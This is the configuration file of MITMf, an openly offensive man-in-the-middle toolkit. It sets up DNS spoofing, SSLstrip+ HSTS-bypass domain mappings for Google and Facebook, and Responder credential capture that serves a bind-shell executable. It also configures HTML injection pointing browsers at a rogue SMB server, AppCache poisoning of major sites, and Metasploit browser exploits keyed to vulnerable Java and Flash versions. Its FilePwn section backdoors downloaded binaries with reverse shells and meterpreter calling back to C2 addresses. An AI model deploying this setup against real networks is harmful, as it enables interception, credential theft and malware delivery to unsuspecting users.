config/mitmf.conf

#
# MITMf configuration file
#

[MITMf]

	# Required BeEF and Metasploit options
	[[BeEF]]
		host = 127.0.0.1
		port = 3000
		user = beef
		pass = beef

	[[Metasploit]]
		rpcip = 127.0.0.1
		rpcport = 55552
		rpcpass = abc123

	[[MITMf-API]]
		host = 127.0.0.1
		port = 9999

	[[DNS]]

		#
		# Here you can configure MITMf's internal DNS server
		#

		tcp      = Off        # Use the TCP DNS proxy instead of the default UDP (not fully tested, might break stuff!)
		port     = 53         # Port to listen on
		ipv6     = Off        # Run in IPv6 mode (not fully tested, might break stuff!)

		#
		# Supported formats are 8.8.8.8#53 or 4.2.2.1#53#tcp or 2001:4860:4860::8888
		# can also be a comma seperated list e.g 8.8.8.8,8.8.4.4
		#
		nameservers = 8.8.8.8

		[[[A]]]     # Queries for IPv4 address records
		*.thesprawl.org=192.168.178.27
		*.captive.portal=192.168.1.100

		[[[AAAA]]]  # Queries for IPv6 address records
		*.thesprawl.org=2001:db8::1

		[[[MX]]]    # Queries for mail server records
		*.thesprawl.org=mail.fake.com

		[[[NS]]]    # Queries for mail server records
		*.thesprawl.org=ns.fake.com

		[[[CNAME]]] # Queries for alias records
		*.thesprawl.org=www.fake.com

		[[[TXT]]]   # Queries for text records
		*.thesprawl.org=fake message

		[[[PTR]]]   # PTR queries
		*.2.0.192.in-addr.arpa=fake.com

		[[[SOA]]] #FORMAT: mname rname t1 t2 t3 t4 t5
		*.thesprawl.org=ns.fake.com. hostmaster.fake.com. 1 10800 3600 604800 3600

		[[[NAPTR]]] #FORMAT: order preference flags service regexp replacement
		*.thesprawl.org=100 10 U E2U+sip !^.*$!sip:customer-service@fake.com! .

		[[[SRV]]] #FORMAT: priority weight port target
		*.*.thesprawl.org=0 5 5060 sipserver.fake.com

		[[[DNSKEY]]] #FORMAT: flags protocol algorithm base64(key)
		*.thesprawl.org=256 3 5 AQPSKmynfzW4kyBv015MUG2DeIQ3Cbl+BBZH4b/0PY1kxkmvHjcZc8nokfzj31GajIQKY+5CptLr3buXA10hWqTkF7H6RfoRqXQeogmMHfpftf6zMv1LyBUgia7za6ZEzOJBOztyvhjL742iU/TpPSEDhm2SNKLijfUppn1UaNvv4w==

		[[[RRSIG]]] #FORMAT: covered algorithm labels labels orig_ttl sig_exp sig_inc key_tag name base64(sig)
		*.thesprawl.org=A 5 3 86400 20030322173103 20030220173103 2642 thesprawl.org. oJB1W6WNGv+ldvQ3WDG0MQkg5IEhjRip8WTrPYGv07h108dUKGMeDPKijVCHX3DDKdfb+v6oB9wfuh3DTJXUAfI/M0zmO/zz8bW0Rznl8O3tGNazPwQKkRN20XPXV6nwwfoXmJQbsLNrLfkGJ5D6fwFm8nN+6pBzeDQfsS3Ap3o=

#
# Plugin configuration starts here
#
[Captive]

	# Set Server Port and string if we are serving our own portal from SimpleHTTPServer (80 is already used by default server)
	Port = 8080
	ServerString = "Captive Server 1.0"

	# Set the filename served as /CaptivePortal.exe by integrated http server
	PayloadFilename = config/captive/calc.exe

[Replace]
	
	[[Regex1]]
		'Google Search' = '44CON'

	[[Regex2]]
		"I'm Feeling Lucky" = "I'm Feeling Something In My Pants"

[Ferret-NG]
	#
	# Here you can specify the client to hijack sessions from
	#

	Client = '10.0.237.91'

[SSLstrip+]
	
	#
	#Here you can configure your domains to bypass HSTS on, the format is real.domain.com = fake.domain.com
	#

	#for google and gmail
	accounts.google.com = account.google.com
	mail.google.com = gmail.google.com
	accounts.google.se = cuentas.google.se

	#for facebook
	www.facebook.com = social.facebook.com

[Responder]

	#Servers to start
	SQL   = On
	HTTPS = On
	Kerberos = On
	FTP  = On
	POP  = On
	SMTP = On
	IMAP = On
	LDAP = On

	#Custom challenge
	Challenge = 1122334455667788

	#Specific IP Addresses to respond to (default = All)
	#Example: RespondTo = 10.20.1.100-150, 10.20.3.10
	RespondTo =

	#Specific NBT-NS/LLMNR names to respond to (default = All)
	#Example: RespondTo = WPAD, DEV, PROD, SQLINT
	RespondToName = 

	#Specific IP Addresses not to respond to (default = None)
	#Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
	DontRespondTo = 

	#Specific NBT-NS/LLMNR names not to respond to (default = None)
	#Example: DontRespondTo = NAC, IPS, IDS
	DontRespondToName =

	[[HTTP Server]]

		#Set to On to always serve the custom EXE
		Serve-Always = Off

		#Set to On to replace any requested .exe with the custom EXE
		Serve-Exe = On

		#Set to On to serve the custom HTML if the URL does not contain .exe
		Serve-Html = Off

		#Custom HTML to serve
		HtmlFilename = config/responder/AccessDenied.html

		#Custom EXE File to serve
		ExeFilename = config/responder/BindShell.exe

		#Name of the downloaded .exe that the client will see
		ExeDownloadName = ProxyClient.exe

		#Custom WPAD Script
		WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}'
		
		#HTML answer to inject in HTTP responses (before </body> tag).
		#Set to an empty string to disable.
		#In this example, we redirect make users' browsers issue a request to our rogue SMB server.
		HTMLToInject = <img src='file://RespProxySrv/pictures/logo.jpg' alt='Loading' height='1' width='1'>

	[[HTTPS Server]]

		#Configure SSL Certificates to use
		SSLCert = config/responder/responder.crt
		SSLKey = config/responder/responder.key

[AppCachePoison]
	# HTML5 AppCache poisioning attack
	# see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
	# generic settings for tampering engine
	
	#enable_only_in_useragents=Chrome|Firefox

	templates_path=config/app_cache_poison_templates

	# when visiting first url matching following expression we will embed iframes with all tamper URLs
	#(to poison the cache for all of them all at once)

	mass_poison_url_match=http://.*prezydent\.pl.*
	
	# it's only useful to mass poison chrome because:
	# - it supports iframe sandbox preventing framebusting
	# - does not ask for confirmation

	mass_poison_useragent_match=Chrome|Safari

	[[test]]
		# any //example.com URL redirects to iana and will display our spoofed content
		
		tamper_url=http://example.com/
		manifest_url=http://www.iana.org/robots.txt #use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!)
		templates=test # which templates to use for spoofing content?
		skip_in_mass_poison=1

	[[google]]
		tamper_url_match = http://www.google.com\.*.
		tamper_url = http://www.google.com
		manifest_url = http://www.google.com/robots.txt

	[[facebook]]
		tamper_url=http://www.facebook.com/?_rdr
		manifest_url=http://www.facebook.com/robots.txt
		templates=facebook # use different template

	[[twitter]]
		tamper_url=http://twitter.com/
		tamper_url_match=^http://(www\.)?twitter\.com/$
		manifest_url=http://twitter.com/robots.txt

	[[html5rocks]]
		tamper_url=http://www.html5rocks.com/en/
		manifest_url=http://www.html5rocks.com/robots.txt

	[[ga]]
		# we can also modify non-HTML URLs to append malicious code to them
		# but for them to be cached in HTML5 AppCache they need to be referred in
		# manifest for a poisoned domain
		# if not, they are "only" cached for 10 years :D

		raw_url=http://www.google-analytics.com/ga.js
		templates=script
		skip_in_mass_poison=1
		#you can add other scripts in additional sections like jQuery etc.

[BrowserSniper]
	#
	# Currently only supports java, flash and browser exploits
	#
	# The version strings were pulled from http://www.cvedetails.com
	#
	# When adding java exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
	#
	
	msfport = 8080    # Port to start Metasploit's webserver which will host the exploits

	[[exploits]]

		[[[multi/browser/java_rhino]]] #Exploit's MSF path
			
			Type = PluginVuln  #Can be set to PluginVuln, BrowserVuln
			OS   = Any         #Can be set to Any, Windows or Windows + version (e.g Windows 8.1)

			Browser = Any   #Can be set to Any, Chrome, Firefox, MSIE or browser + version (e.g IE 6)
			Plugin  = Java  #Can be set to Java, Flash (if Type is BrowserVuln will be ignored)

			#An exact list of the plugin versions affected (if Type is BrowserVuln will be ignored)
			PluginVersions = 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.23, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.3, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0

		[[[multi/browser/java_atomicreferencearray]]]

			Type    = PluginVuln
			OS      = Any
			Browser = Any
			Plugin  = Java
			PluginVersions = 1.5.0, 1.5.0.1, 1.5.0.10, 1.5.0.11, 1.5.0.12, 1.5.0.13, 1.5.0.14, 1.5.0.15, 1.5.0.16, 1.5.0.17, 1.5.0.18, 1.5.0.19, 1.5.0.2, 1.5.0.20, 1.5.0.21, 1.5.0.22, 1.5.0.23, 1.5.0.24, 1.5.0.25, 1.5.0.26, 1.5.0.27, 1.5.0.28, 1.5.0.29, 1.5.0.3, 1.5.0.31, 1.5.0.33, 1.5.0.4, 1.5.0.5, 1.5.0.6, 1.5.0.7, 1.5.0.8, 1.5.0.9, 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.29, 1.6.0.3, 1.6.0.30, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0, 1.7.0.1, 1.7.0.2

		[[[multi/browser/java_jre17_jmxbean_2]]]
			
			Type    = PluginVuln
			OS      = Any
			Browser = Any
			Plugin  = Java
			PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
		
		[[[multi/browser/java_jre17_reflection_types]]]

			Type    = PluginVuln
			OS      = Any
			Browser = Any
			Plugin  = Java
			PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
		
		[[[multi/browser/java_verifier_field_access]]]

			Type    = PluginVuln
			OS      = Any
			Browser = Any
			Plugin  = Java
			PluginVersions = 1.4.2.37, 1.5.0.35, 1.6.0.32, 1.7.0.4

		[[[multi/browser/java_jre17_provider_skeleton]]]

			Type    = PluginVuln
			OS      = Any
			Browser = Any
			Plugin  = Java
			PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.21, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9

		[[[exploit/windows/browser/adobe_flash_pcre]]]

			Type    = PluginVuln
			OS      = Windows
			Browser = Any
			Plugin  = Flash
			PluginVersions = 11.2.202.440, 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296

		[[[exploit/windows/browser/adobe_flash_net_connection_confusion]]]

			Type    = PluginVuln
			OS      = Windows
			Browser = Any
			Plugin  = Flash
			PluginVersions = 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 16.0.0.305

		[[[exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array]]]

			Type    = PluginVuln
			OS      = Windows
			Browser = Any
			Plugin  = Flash
			PluginVersions = 11.2.202.223, 11.2.202.228, 11.2.202.233, 11.2.202.235, 11.2.202.236, 11.2.202.238, 11.2.202.243, 11.2.202.251, 11.2.202.258, 11.2.202.261, 11.2.202.262, 11.2.202.270, 11.2.202.273,11.2.202.275, 11.2.202.280, 11.2.202.285, 11.2.202.291, 11.2.202.297, 11.2.202.310, 11.2.202.332, 11.2.202.335, 11.2.202.336, 11.2.202.341, 11.2.202.346, 11.2.202.350, 11.2.202.356, 11.2.202.359, 11.2.202.378, 11.2.202.394, 11.2.202.400, 13.0.0.111, 13.0.0.182, 13.0.0.201, 13.0.0.206, 13.0.0.214, 13.0.0.223, 13.0.0.231, 13.0.0.241, 13.0.0.83, 14.0.0.110, 14.0.0.125, 14.0.0.137, 14.0.0.145, 14.0.0.176, 14.0.0.178, 14.0.0.179, 15.0.0.144

		[[[exploit/multi/browser/adobe_flash_opaque_background_uaf]]]

			Type = PluginVuln
			OS = Any
			Browser = Any
			Plugin = Flash
			PluginVersions = 11.1, 11.1.102.59, 11.1.102.62, 11.1.102.63, 11.1.111.44, 11.1.111.50, 11.1.111.54, 11.1.111.64, 11.1.111.73, 11.1.111.8, 11.1.115.34, 11.1.115.48, 11.1.115.54, 11.1.115.58, 11.1.115.59, 11.1.115.63, 11.1.115.69, 11.1.115.7, 11.1.115.81, 11.2.202.223, 11.2.202.228, 11.2.202.233, 11.2.202.235, 11.2.202.236, 11.2.202.238, 11.2.202.243, 11.2.202.251, 11.2.202.258, 11.2.202.261, 11.2.202.262, 11.2.202.270, 11.2.202.273, 11.2.202.275, 11.2.202.280, 11.2.202.285, 11.2.202.291, 11.2.202.297, 11.2.202.310, 11.2.202.327, 11.2.202.332, 11.2.202.335, 11.2.202.336, 11.2.202.341, 11.2.202.346, 11.2.202.350, 11.2.202.356, 11.2.202.359, 11.2.202.378, 11.2.202.394, 11.2.202.411, 11.2.202.424, 11.2.202.425, 11.2.202.429, 11.2.202.438, 11.2.202.440, 11.2.202.442, 11.2.202.451, 11.2.202.468, 13.0.0.182, 13.0.0.201, 13.0.0.206, 13.0.0.214, 13.0.0.223, 13.0.0.231, 13.0.0.241, 13.0.0.244, 13.0.0.250, 13.0.0.257, 13.0.0.258, 13.0.0.259, 13.0.0.260, 13.0.0.262, 13.0.0.264, 13.0.0.289, 13.0.0.292, 13.0.0.302, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 17.0.0.134, 17.0.0.169, 17.0.0.188, 17.0.0.190, 18.0.0.160, 18.0.0.194, 18.0.0.203, 18.0.0.204

		[[[exploit/multi/browser/adobe_flash_hacking_team_uaf]]]

			Type = PluginVuln
			OS = Any
			Browser = Any
			Plugin = Flash
			PluginVersions = 13.0.0.292, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 17.0.0.134, 17.0.0.169, 17.0.0.188, 18.0.0.161, 18.0.0.194

[FilePwn]

	# 
	#   Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
	#	
	#	Copyright (c) 2013-2014, Joshua Pitts
	#	All rights reserved.
	#
	#	Redistribution and use in source and binary forms, with or without modification,
	#	are permitted provided that the following conditions are met:
	#
	#    1. Redistributions of source code must retain the above copyright notice,
	#    this list of conditions and the following disclaimer.
	#
	#    2. Redistributions in binary form must reproduce the above copyright notice,
	#   this list of conditions and the following disclaimer in the documentation
	#    and/or other materials provided with the distribution.
	#
	#    3. Neither the name of the copyright holder nor the names of its contributors
	#    may be used to endorse or promote products derived from this software without
	#    specific prior written permission.
	#
	#	THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
	#	AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
	#	IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
	#	ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
	#	LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
	#	CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
	#	SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
	#	INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
	#	CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
	#	ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
	#	POSSIBILITY OF SUCH DAMAGE.
	#

	[[hosts]]
	#whitelist host/IP - patch these only. 
	#ALL is everything, use the blacklist to leave certain hosts/IPs out

	whitelist = ALL

	#Hosts that are never patched, but still pass through the proxy. You can include host and ip, recommended to do both.

	blacklist = ,   # a comma is null do not leave blank


	[[keywords]]
	#These checks look at the path of a url for keywords

	whitelist = ALL

	#For blacklist note binaries that you do not want to touch at all

	# Also applied in zip files

	blacklist = .dll


	[[ZIP]]
	# patchCount is the max number of files to patch in a zip file
	# After the max is reached it will bypass the rest of the files 
	# and send on it's way

	patchCount = 5

	# In Bytes
	maxSize = 50000000

	blacklist = .dll,  #don't do dlls in a zip file

	[[TAR]]
	# patchCount is the max number of files to patch in a tar file
	# After the max is reached it will bypass the rest of the files
	# and send on it's way

	patchCount = 5

	# In Bytes
	maxSize = 10000000

	blacklist = ,   # a comma is null do not leave blank

	[[targets]]
		#MAKE SURE that your settings for host and port DO NOT
		# overlap between different types of payloads
		
		[[[ALL]]] # DEFAULT settings for all targets REQUIRED
		
		LinuxType = ALL 	# choices: x86/x64/ALL/None
		WindowsType = ALL 	# choices: x86/x64/ALL/None
		FatPriority = x64   # choices: x86 or x64
		
		FileSizeMax = 10000000  # ~10 MB (just under) No patching of files this large

		CompressedFiles = True #True/False
			[[[[LinuxIntelx86]]]]
			SHELL = reverse_shell_tcp   # This is the BDF syntax
			HOST = 192.168.1.168 		# The C2
			PORT = 8888
			SUPPLIED_SHELLCODE = None
			MSFPAYLOAD = linux/x86/shell_reverse_tcp	# MSF syntax
			
			[[[[LinuxIntelx64]]]]
			SHELL = reverse_shell_tcp
			HOST = 192.168.1.16
			PORT = 9999
			SUPPLIED_SHELLCODE = None
			MSFPAYLOAD = linux/x64/shell_reverse_tcp

			[[[[WindowsIntelx86]]]]
			PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
			# PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke
			PATCH_METHOD = automatic
			HOST = 192.168.20.79
			PORT = 8090
			# SHELL for use with automatic PATCH_METHOD
			SHELL = iat_reverse_tcp_stager_threaded
			# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
			SUPPLIED_SHELLCODE = None
			ZERO_CERT = True
			# PATCH_DLLs as they come across
			PATCH_DLL = False
			# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
			RUNAS_ADMIN = False
			# XP_MODE  - to support XP targets
			XP_MODE = True
			# SUPPLIED_BINARY is for use with PATCH_METHOD 'onionduke' DLL/EXE can be x64 and
			#  with PATCH_METHOD 'replace' use an EXE not DLL
			SUPPLIED_BINARY = veil_go_payload.exe
			MSFPAYLOAD = windows/meterpreter/reverse_tcp

			[[[[WindowsIntelx64]]]]
			PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
			# PATCH_METHOD overwrites PATCH_TYPE, use automatic or onionduke
			PATCH_METHOD = automatic
			HOST = 192.168.1.16
			PORT = 8088
			# SHELL for use with automatic PATCH_METHOD
			SHELL = iat_reverse_tcp_stager_threaded
			# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
			SUPPLIED_SHELLCODE = None
			ZERO_CERT = True
			PATCH_DLL = True
			# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
			RUNAS_ADMIN = False
			# SUPPLIED_BINARY is for use with PATCH_METHOD onionduke DLL/EXE can x86 32bit and
			#  with PATCH_METHOD 'replace' use an EXE not DLL
			SUPPLIED_BINARY = pentest_x64_payload.exe
			MSFPAYLOAD = windows/x64/shell/reverse_tcp

			[[[[MachoIntelx86]]]]
			SHELL = reverse_shell_tcp
			HOST = 192.168.1.16
			PORT = 4444
			SUPPLIED_SHELLCODE = None
			MSFPAYLOAD = linux/x64/shell_reverse_tcp

			[[[[MachoIntelx64]]]]
			SHELL = reverse_shell_tcp
			HOST = 192.168.1.16
			PORT = 5555
			SUPPLIED_SHELLCODE = None
			MSFPAYLOAD = linux/x64/shell_reverse_tcp

		# Call out the difference for targets here as they differ from ALL
		# These settings override the ALL settings
		
		[[[sysinternals.com]]]
		LinuxType = None
		WindowsType = ALL
		CompressedFiles = False
		#inherits WindowsIntelx86 from ALL
			[[[[WindowsIntelx86]]]]
			PATCH_DLL = False
			ZERO_CERT = True

		[[[sourceforge.org]]]
		WindowsType = x64
		CompressedFiles = False

			[[[[WindowsIntelx64]]]]
			PATCH_DLL = False

			[[[[WindowsIntelx86]]]]
			PATCH_DLL = False